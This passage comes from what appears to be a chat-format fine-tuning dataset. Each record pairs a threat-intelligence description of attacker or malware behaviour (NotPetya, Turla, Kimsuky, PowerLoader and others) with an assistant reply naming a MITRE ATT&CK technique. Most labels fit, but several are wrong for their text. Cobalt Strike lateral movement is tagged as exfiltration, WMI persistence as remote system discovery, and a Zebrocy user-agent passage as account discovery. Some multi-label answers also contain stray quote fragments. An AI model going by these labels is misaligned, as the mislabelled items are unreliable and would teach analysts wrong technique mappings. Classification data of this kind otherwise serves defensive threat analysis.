\"‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute’\" from \"‘autocheck autochk *’\" to \"‘autocheck autoche *’\"." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Creates new users’ accounts" }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attor's installer plugin can schedule rundll32.exe to load the dispatcher." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SombRAT can use a custom DGA to generate a subdomain for C2." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThreatNeedle can download additional tools to enable lateral movement." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon has an operational mode for encrypting data instead of overwriting it." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot can deobfuscate strings and files for execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used \"net localgroup\" and \"net localgroup Administrators\" to enumerate group information, including members of the local administrators group." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD." }, { "role": "assistant", "content": "T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clicking on the shortcut ultimately leads to Backdoor.Pirpi being downloaded and executed on the affected computer" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To execute the main downloaded payload, the loader tries to masquerade as a legitimate Windows service, claiming in its fake description, that it is used to support packed applications" }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can maintain persistence by creating an auto-run Registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve data from memory, or a fileserver to copy IP, as we have both observed" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf can use steganography to hide malicious code downloaded to the victim." }, { "role": "assistant", "content": "T1001.002 - Data Obfuscation via Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A sample of the data that is encrypted and sent to the CnC server for version ‘p=2’ is seen in the memory dump shown in Figure 6. At offset 4-7 it contains a time-based counter. It uses the keyword \"osamu\" in this instance to identify this particular campaign. The campaign keywords are not sent out in version ‘p=1’ but can still be found hardcoded in the DLL payload. The hostname and OS information are also included in the beacon. It awaits further commands from the CnC server in response to the data sent out." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The group has been known to compress data before exfiltration." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement." }, { "role": "assistant", "content": "T1021.005 - Remote Services:VNC" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon Group has registered domains to stage payloads." }, { "role": "assistant", "content": "T1608.001 - Upload Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in collects information on available printers and disk drives." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MarkiRAT can use BITS Utility to connect with the C2 server." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Recently, after looking at the difference between 0vercl0ck’s proof of concept and the real deal, a friend asked me “Why does PowerLoader go to all the trouble of using ROP chains instead of just executing the shellcode like 0vercl0ck does. PowerLoader gets the malicious code into the process by opening an existing, shared section already mapped into explorer, removing the need to allocate heap space or overwrite process memory. By opening “Shell_TrayWnd” and calling SetWindowLong, PowerLoader is able to set a variable used by the window procedure to point to a specific address in its shellcode. The read part won’t trigger DEP (Data Execution Prevention), if the section is not executable (in later versions of windows it is execute-protected), however if EAX points to an address inside the section, DEP will be triggered. Well how does one get from KiUserApcDispatcher to code execution, without executing the non-executable shellcode, I hear you ask. Next it pops the return address into the EAX and then calls it, this results in execution being transferred back to the Window Procedure. The sequences are instruction within the executable regions of explorer’s memory, their purpose is to perform certain operations as PowerLoader can’t execute any of its own code yet, due to the section being execute-protected. 00100E28 points to some code in explorer that executes the instruction “STD” followed by “RET”, As a result the instruction underlined in red will result in the direction flag being set and execution being returned to the Window Procedure. Well these bytes were found, in this case inside some random shell32 function (it doesn’t matter). Now the pointer doesn’t point to the start of the function, it points somewhere in the middle, as a result, only the bytes in the red box are executed. Remember: because all addresses points to executable code within explorer address space, and they are called using a pointer, no code in the shellcode is actually executed, thus resulting in no nasty DEP errors" }, { "role": "assistant", "content": "T1055.011 - Process Injection: Extra Window Memory Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex contains a module for VNC." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Execute noninteractive commands on multiple hosts at once" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Although it has only recently been launched, IcedID already uses redirection attacks. The redirection scheme IcedID uses is not a simple handover to another website with a different URL. Rather, it is designed to appear as seamless as possible to the victim. These tactics include displaying the legitimate bank’s URL in the address bar and the bank’s correct SSL certificate, which is made possible by keeping a live connection with the actual bank’s site" }, { "role": "assistant", "content": "T1185 - Browser Session Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After successful lateral movement, the attackers tried to establish persistency on selected servers –targeting all domain controllers, but also other servers. To achieve persistency, they used WMI Event Subscription with a few different WMI objects" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OnionDuke can use a custom decryption algorithm to decrypt strings." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has signed its malware with an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited.”" }, { "role": "assistant", "content": "T1036.001 - Invalid Code Signature" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has deleted the exfiltrated data on disk after transmission. Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used rgsvr32 to execute custom malware." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "lists running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack has used \"cmd.exe\" to add a persistent service." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SpeakUp uses cron tasks to ensure persistence." }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bad Rabbit can enumerate all running processes to compare hashes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gain access to the victim’s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator’s account" }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol', 'T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has used ZIP to compress data gathered on a compromised host." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These are in-line with the targeting of the victims witnessed by the attackers using Conmie" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Microsoft by default disables the dynamic execution of the macro, and if an attacker needs to execute one dynamically—which is the case here—the threat actor needs to bypass the VB object model (VBOM) by modifying its registry value" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After we decrypted the additional shellcode, we determined that the functional shellcode is part of the Metasploit Framework, specifically using the block_api.asm code to resolve API function names and the block_reverse_http.asm code to obtain additional shellcode to execute on the system" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex can wipe deleted data from all drives using \"cipher.exe\"." }, { "role": "assistant", "content": "T1561.001 - Disk Content Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP or HTTPS for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM has relied on users opening malicious email attachments, decompressing the attached archive, and double-clicking the executable within." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has deleted the MSI file after installation." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Compiled HTML File (CHM) are commonly Microsoft help files. These file will be a compiled HTML files that includes documents , image , scripts etc. Hackers will abuse these files to embed malicious payload with CHM files. CHM files can be executed by HH.exe , which is a Microsoft windows utility. Adversaries use this techniques to evade AV or application blacklisting techniques." }, { "role": "assistant", "content": "T1218 - Signed Binary Proxy Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkHydrus has used \"-WindowStyle Hidden\" to conceal PowerShell windows." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Calisto can collect data from user directories." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks. No guest credentials were observed being stolen at the compromised hotels; however, in a separate incident that occurred in Fall 2016, APT28 gained initial access to a victim’s network via credentials likely stolen from a hotel Wi-Fi network.  Upon gaining access to the machines connected to corporate and guest Wi-Fi networks, APT28 deployed Responder" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "kaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions" }, { "role": "assistant", "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This would save them the trouble of needing to load additional malware to exfiltrate files or other material. We are aware of no evidence of follow-up interactions between the operators and successful victims as part of any extortion attempts. Furthermore, Stealth Falcon’s use of JavaScript to profile and de-anonymize victims seems inconsistent with a primary motivation of collecting information that could be used for blackmail" }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gamaredon is an advanced persistent threat (APT) group that has been active since 2013. From late 2019 to February of this year, researchers published several reports on Gamaredon, tracking the group’s activities" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdoor.Oldrea can use rundll32 for execution on compromised hosts." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM can execute Powershell commands sent from its C2 server." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "However, we were able determine a unique, hard-coded user agent used for the C2 communications: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Using AutoFocus, we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent" }, { "role": "assistant", "content": "T1087 - Account Discovery', 'T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to capture VoiceIP application audio on an infected host." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to disable routing and the Firewall on the victim’s machine." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A backdoor used by created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "My blog post, “Remote Mac Exploitation Via Custom URL Schemes”, describes the technical details of how WindShift (ab)used custom URL schemes to infect macOS systems" }, { "role": "assistant", "content": "T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zeus Panda checks for the existence of a Registry key and if it contains certain values." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some versions have an embedded DLL known as MockDll that uses and regsvr32 to execute another payload." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nomadic Octopus has used malicious macros to download additional files to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used the \"tasklist\" command to search for one of its backdoors." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leafminer infected victims using JavaScript code." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has obtained and used tools such as Nirsoft WebBrowserPassVIew, Mimikatz, and PsExec." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Industroyer’s 61850 payload component enumerates connected network adapters and their corresponding IP addresses." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As we mentioned, the adversary used a technique called template injection. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link towards the template file in one of the .XML files, for example the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code, that will load a DLL implant onto the victim’s system" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 routinely removed their tools, including custom backdoors, once remote access was achieved." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LAPSUS$ has gathered detailed knowledge of an organization's supply chain relationships." }, { "role": "assistant", "content": "T1591.002 - Business Relationships" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has researched software code to enable supply-chain operations, most notably for the 2017 NotPetya attack. Sandworm Team also collected a list of computers using specific software as part of its targeting efforts." }, { "role": "assistant", "content": "T1592.002 - Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "yty”, the name we use for the framework, from the PDB path string. A “bot id” consisting of computer name, user name, and volume serial number separated by dashes" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The account names visually look similar to legitimate government organization names or other trusted third-party entities" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate 